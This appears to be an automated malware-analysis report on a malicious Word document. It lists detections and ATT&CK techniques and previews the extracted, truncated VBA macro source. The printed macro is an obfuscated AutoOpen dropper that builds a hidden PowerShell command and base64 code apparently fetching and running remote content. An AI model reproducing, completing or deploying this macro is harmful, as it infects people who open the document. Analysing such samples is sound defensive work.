MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro with an AutoOpen function. This macro utilizes the Shell() function, indicating an attempt to execute arbitrary commands. The ClamAV detection and heuristic firings strongly suggest this is a dropper or downloader, though the exact payload and family could not be determined from the provided evidence.
Heuristics 7
-
ClamAV: Doc.Dropper.Agent-6446941-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6446941-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8854 bytes |
SHA-256: cdced11b6e20d5eba97991f983b71d73d0a28aac7d026a225e852b0345c67e66 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "jameson"
Sub AutoOpen()
Dim HK_OI As String
DL_LD = Array("t", "-", "d", "b", "a", " ", "h", "o", "l", "w", "x", "i", "y", "p", "e", "c", "s", "r", "n", "u")
Dim EN_TC As String
EN_TC = "ZgB1AG4AYwB0AGkAb"
Dim HM_KC As String
HM_KC = "wBuACAAYQAoACQA"
Dim JQ_OJ As String
JQ_OJ = "eAApAHsAcgBlAHQAd"
HK_OI = HK_OI + DL_LD(13)
HK_OI = HK_OI + DL_LD(7)
Dim FR_MB As String
FR_MB = "QByAG4AIABbAFMAeQBzA"
Dim CL_NH As String
CL_NH = "HQAZQBtAC4AV"
AP_RE = AP_RE & EN_TC & HM_KC & JQ_OJ & FR_MB & CL_NH
Dim HL_LI As String
HL_LI = "ABlAHgAdAAuAE"
HK_OI = HK_OI + DL_LD(9)
HK_OI = HK_OI + DL_LD(14)
Dim JL_OG As String
JL_OG = "UAbgBjAG8AZABp"
Dim HL_RD As String
HL_RD = "AG4AZwBdADoAOgBVA"
Dim DP_LC As String
DP_LC = "FQARgA4A"
HK_OI = HK_OI + DL_LD(17)
HK_OI = HK_OI + DL_LD(16)
Dim FT_LG As String
FT_LG = "C4ARwBlA"
AP_RE = AP_RE & HL_LI & JL_OG & HL_RD & DP_LC & FT_LG
Dim JR_NI As String
JR_NI = "HQAUwB0AHIAaQB"
Dim JQ_PH As String
JQ_PH = "uAGcAKABbAFMAeQ"
HK_OI = HK_OI + DL_LD(6)
HK_OI = HK_OI + DL_LD(14)
Dim FN_PB As String
FN_PB = "BzAHQAZQBtA"
Dim JO_KH As String
JO_KH = "C4AQwBvAG4AdgBlAHIA"
Dim IK_RJ As String
IK_RJ = "dABdADoAOgBGAHI"
AP_RE = AP_RE & JR_NI & JQ_PH & FN_PB & JO_KH & IK_RJ
HK_OI = HK_OI + DL_LD(8)
HK_OI = HK_OI + DL_LD(8)
Dim FO_KE As String
FO_KE = "AbwBtAEIAYQBzAGUANg"
Dim FK_PE As String
FK_PE = "A0AFMAdAByAGk"
Dim IO_NJ As String
IO_NJ = "AbgBnACgAJAB4ACk"
HK_OI = HK_OI + DL_LD(5)
HK_OI = HK_OI + DL_LD(1)
Dim DO_SB As String
DO_SB = "AKQB9ADsAaQBlA"
Dim FR_RI As String
FR_RI = "HgAIAAkACgAYQAg"
AP_RE = AP_RE & FO_KE & FK_PE & IO_NJ & DO_SB & FR_RI
Dim AR_MJ As String
AR_MJ = "ACQAKAAkACgAJA"
HK_OI = HK_OI + DL_LD(9)
HK_OI = HK_OI + DL_LD(11)
Dim ER_RD As String
ER_RD = "AoAGkAbg"
Dim FQ_NH As String
FQ_NH = "B2AG8AawBlAC0A"
Dim CK_NI As String
CK_NI = "dwBlAGIAcgB"
HK_OI = HK_OI + DL_LD(18)
HK_OI = HK_OI + DL_LD(2)
Dim AN_QC As String
AN_QC = "lAHEAdQBlAHMAdA"
AP_RE = AP_RE & AR_MJ & ER_RD & FQ_NH & CK_NI & AN_QC
Dim AQ_PE As String
AQ_PE = "AgACcAaAB0AHQ"
Dim FQ_SA As String
FQ_SA = "AcABzADoALw"
HK_OI = HK_OI + DL_LD(7)
HK_OI = HK_OI + DL_LD(9)
Dim HP_KC As String
HP_KC = "AvAHUAcwBwAHIAZAA1"
Dim GT_LG As String
GT_LG = "ADEANQAwAGM"
Dim AR_MG As String
AR_MG = "AZQBuAHQAcgBhA"
AP_RE = AP_RE & AQ_PE & FQ_SA & HP_KC & GT_LG & AR_MG
HK_OI = HK_OI + DL_LD(16)
HK_OI = HK_OI + DL_LD(0)
Dim BS_LF As String
BS_LF = "GwALgB0AGEAYgBsAGUAL"
Dim FR_ME As String
FR_ME = "gBjAG8Ac"
Dim BL_SI As String
BL_SI = "gBlAC4Ad"
HK_OI = HK_OI + DL_LD(12)
HK_OI = HK_OI + DL_LD(8)
Dim GO_KG As String
GO_KG = "wBpAG4AZ"
Dim FO_RI As String
FO_RI = "ABvAHcAcw"
AP_RE = AP_RE & BS_LF & FR_ME & BL_SI & GO_KG & FO_RI
Dim CP_KF As String
CP_KF = "AuAG4AZQB0AC8AdwB"
HK_OI = HK_OI + DL_LD(14)
HK_OI = HK_OI + DL_LD(5)
Dim FK_KF As String
FK_KF = "hAHIAZQBoAG"
Dim HQ_OI As String
HQ_OI = "8AdQBzAG"
Dim EP_QI As String
EP_QI = "UAPwAkAGYAaQ"
HK_OI = HK_OI + DL_LD(6)
HK_OI = HK_OI + DL_LD(11)
Dim GM_OH As String
GM_OH = "BsAHQAZQByAD0AUABhAH"
AP_RE = AP_RE & CP_KF & FK_KF & HQ_OI & EP_QI & GM_OH
Dim FK_OH As String
FK_OH = "IAdABpAHQA"
Dim FP_KC As String
FP_KC = "aQBvAG4"
HK_OI = HK_OI + DL_LD(2)
HK_OI = HK_OI + DL_LD(2)
Dim FL_LE A
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.